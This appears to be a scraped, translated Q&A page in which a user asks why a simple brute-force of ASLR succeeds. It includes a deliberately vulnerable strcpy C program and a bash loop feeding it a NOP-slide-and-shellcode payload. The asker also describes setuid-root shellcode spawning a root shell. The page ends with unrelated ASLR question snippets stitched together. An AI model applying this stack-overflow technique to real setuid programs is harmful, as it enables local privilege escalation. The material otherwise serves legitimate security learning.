- c - 在位数组中找到第一个零
- linux - Unix 显示有关匹配两种模式之一的文件的信息
- 正则表达式替换多个文件
- linux - 隐藏来自 xtrace 的命令
我刚读到地址空间布局随机化,我尝试了一个非常简单的脚本来尝试暴力破解它。这是我用来测试一些东西的程序。
#include <stdio.h>
#include <string.h>
int main (int argc, char **argv)
{
char buf[8];
printf("&buf = %p\n", buf);
if (argc > 1 && strcpy(buf, argv[1]));
return 0;
}
我用这个命令编译它:
gcc -g -fno-stack-protector -o vul vul.c
我确保启用了 ASLR:
$ sysctl kernel.randomize_va_space
kernel.randomize_va_space = 2
然后,我想到了这个简单的脚本:
str=`perl -e 'print "\x40\xfa\xbb\xbf"x10 \
. "\x90"x65536 \
. "\x31\xc0\x40\x89\xc3\xcd\x80"'`
while [ $? -ne 1 ]; do
./vul $str
done
格式为
return address many times | 64KB NOP slide | shellcode that runs exit(1)
在运行此脚本几秒钟后,它按我的意愿退出并显示错误代码 1。我还尝试了其他调用 execv("/bin/sh", ...) 的 shellcode,我也成功了。
我觉得很奇怪,即使在返回地址之后也可以创建这么长的 NOP 幻灯片。我认为 ASLR 更有效,我错过了什么吗?是地址空间太小了吗?
编辑:我做了一些额外的研究,这是我的发现:
我请一位 friend 在他的 64b 计算机上使用 -m32 -z execstack
运行此代码,稍微更改返回地址后,他得到了相同的结果。
即使我没有使用-z execstack
,我还是设法执行了shellcode。我通过使用不同的 shellcode 来确保这一点,这些 shellcode 都做了他们应该做的事情(即使是众所周知的场景 chown root ./vul
,chmod +s ./vul
, shellcode 运行 setreuid(0, 0)
然后 execv("/bin/sh", ...)
最后 whoami
返回生成的外壳中的“root”)。这很奇怪,因为 execstack -q ./vul
告诉我可执行堆栈标志位未设置。有谁知道为什么?
最佳答案
首先,我有点惊讶您不需要将选项 -z execstack
传递给编译器来获取 shellcode 来执行 exit(1)
。
此外,我猜您使用的是 32 位机器,因为您没有将选项 -m32
传递给 gcc
以获得 32 位代码。
最后,我确实运行了你的程序但没有成功(我等了不止几秒钟)。
所以,我对你的结论有点怀疑(除非你运行的是一个非常特殊的 Linux 系统或者可能很幸运)。
无论如何,有两件事你没有提到:
您可以查看 ASLR 维基百科页面上的“ASLR Effectiveness”部分。
关于c - ASLR暴力破解,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/16110591/
如何启用可执行文件的地址空间布局随机化? 注意:我没有使用 Visual Studio 或任何提供 /dynamicbase 编译器选项的编译器。 为了讨论的目的,假设我正在向编译器添加功能以启用 A
我不太确定了解 ASLR 和 PIE 之间的区别。 在我看来,ASLR 是一个操作系统选项,而 PIE 是一个编译选项。 所以, - 如果我在启用了 ASLR 的操作系统上运行无 PIE 程序会发生什
我听说过这个理论。地址空间位置随机化获取库并将它们加载到虚拟地址空间中的随机位置,以便黑客在您的程序中发现漏洞时,他没有预先知道的地址来执行返回到 libc 攻击反对,例如。但是想了几秒,作为防御手段
int main(int argc, char **argv) { personality(ADDR_NO_RANDOMIZE); if (fork()) { return 0;
我需要获取 .exe 的基地址,它在每次启动时都有一个随机基地址。我试过这个,但它似乎不起作用: int Base = (DWORD)GetModuleHandle("Test.exe"); 怎么了?
我刚读到 ASLR 如何帮助防止缓冲区溢出攻击,并想看看它的实现。 有人可以提供一些关于我可以从哪里开始寻找的指示吗?如果您能指出更多与此相关的阅读 Material ,我也很乐意。 最佳答案 实现自
比如说,如果我有一个进程 ID PID,是否有一个 WinAPI 可以查明 ASLR 是否存在?是否为该特定进程启用/禁用? 最佳答案 ASLR 不是针对每个进程启用的,而是仅针对那些在 IMAGE_
看看这个主要的: int main() { int asd = 10; printf("%p\n", &asd); return 0; } 某时刻asd的地址: 0x7ffff5f7c16
我在启用了 ASLR 的开发箱上运行了这段 C 代码。它返回一个 char 指针 (char *) 给一个函数,但不知何故,返回的指针地址中的几个字节发生了变化,printf 输出如下: kerb_s
所以我正在做一个越狱调整,在启动时 Hook 到一个特定的应用程序,以允许用户使用该应用程序的游戏内模组,但到目前为止,我能让它工作的唯一方法是使用 ASLR禁用的应用程序。由于法律原因我无法发布禁用
ASLR 在我的机器上是活跃的: $ cat /proc/sys/kernel/randomize_va_space 2 $ ldd prog.out linux-vdso.so.1 =>
我对 ASLR 相当熟悉,但今天我听到了一个关于 Windows 中 ASLR 实现的有趣的新事实。 如果进程 A 和 B 加载相同的 dll,为了优化性能,Windows 只会将其加载到物理内存一次
我检查了 ASLR 是否启用如下,我认为它是: [user@localhost test]$ cat /proc/sys/kernel/randomize_va_space 2 我尝试使用以下程序对其
我使用的是 32 位 x86 Ubuntu 桌面。我查看了/proc/[pid]/mmaps,发现堆栈基地址总是在变化(例如,在以下情况中为 0xbfe76000)。所以我猜内核(或 ELF 加载器)
根据ASLR(Address Space Layout Randomization),它在每次进程启动时提供随机堆栈和堆分配和页面加载,并随机化放置对象在给定进程的虚拟空间中的地址。 但是在我在ios
嗨,我正在使用 Ubuntu,刚刚关闭了 ASLR 来检查 2 个文件(dumb.c 和 dumber.c) dumb正在创建一个文件并输入变量地址 傻瓜正在阅读它并打印我无法理解为什么在某些计算机上
Android 4.0 添加了 ASLR http://developer.android.com/sdk/android-4.0-highlights.html#DeveloperApis Afai
在Linux中,启用ASLR后,用户堆栈地址是否存在一个地址范围?堆、指令地址(文本部分)怎么样?一般来说,是否可以通过查看地址来判断它是用于数据还是用于代码? 编辑:我正在尝试编写一个 Pintoo
我编写了一个简单的 python 脚本(只是一个消息框)并使用 pyInstaller 使其可执行。我想使用 Powershell 脚本 Invoke-ReflectivePEInjection.ps
我想知道是否有人可以访问函数地址从一个程序实例到另一个实例相同的库? 最佳答案 地址空间布局在同一台设备上运行时会非常一致。许多主要的系统库都是由 zygote 预加载的,因此作为共享映射被它派生出来
我是一名优秀的程序员,十分优秀!